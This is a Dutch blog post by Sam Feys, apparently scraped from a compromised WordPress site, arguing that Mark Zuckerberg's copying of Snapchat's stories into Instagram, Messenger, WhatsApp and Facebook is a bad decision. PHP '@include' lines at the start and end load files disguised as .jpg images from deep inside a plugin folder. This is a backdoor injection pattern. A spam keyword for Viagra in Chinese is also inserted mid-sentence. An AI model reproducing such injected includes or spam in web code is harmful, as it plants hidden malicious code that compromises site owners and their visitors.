@include "wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/include/0845.jpg"; ob_start(); ?> De ongelofelijk foute obsessie van Mark Zuckerberg - Sam Feys

De ongelofelijk foute obsessie van Mark Zuckerberg


Voor Mark Zuckerberg is het nooit genoeg. De Facebook-baas probeerde ooit Snapchat te kopen, een pijnlijke affaire. Hij voelde zich persoonlijk afgewezen toen hij het deksel op de neus kreeg. Sindsdien is hij geobsedeerd door verhalen die na 24 uur verdwijnen. Die obsessie leidde onlangs tot een eerste succes.

Instagram, de app die hij in 2012 strategisch kocht voor een prikje, kopieerde alles wat de verhalenfunctie van Snapchat zo leuk maakt. Nu maken mensen massaal verhalen voor Instagram en wordt Snapchat voornamelijk gebruikt door een aantal tieners en Tanja Dexters.

Nu Instagram Stories een 威而鋼
succes blijkt, nam Zuckerberg het vreselijke besluit om diezelfde functionaliteit ook naar Messenger, WhatsApp en de mobiele Facebook-app te kopiëren. Vier apps van Facebook bieden nu dezelfde functie aan en beginnen er als klonen van elkaar uit te zien. Een ongelofelijk foute keuze. (meer…)

Twitter
Instagram
LinkedIn

Krijg een e-mail bij een nieuwe blogpost
RSS-feed

@include "wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/include/3942.jpg";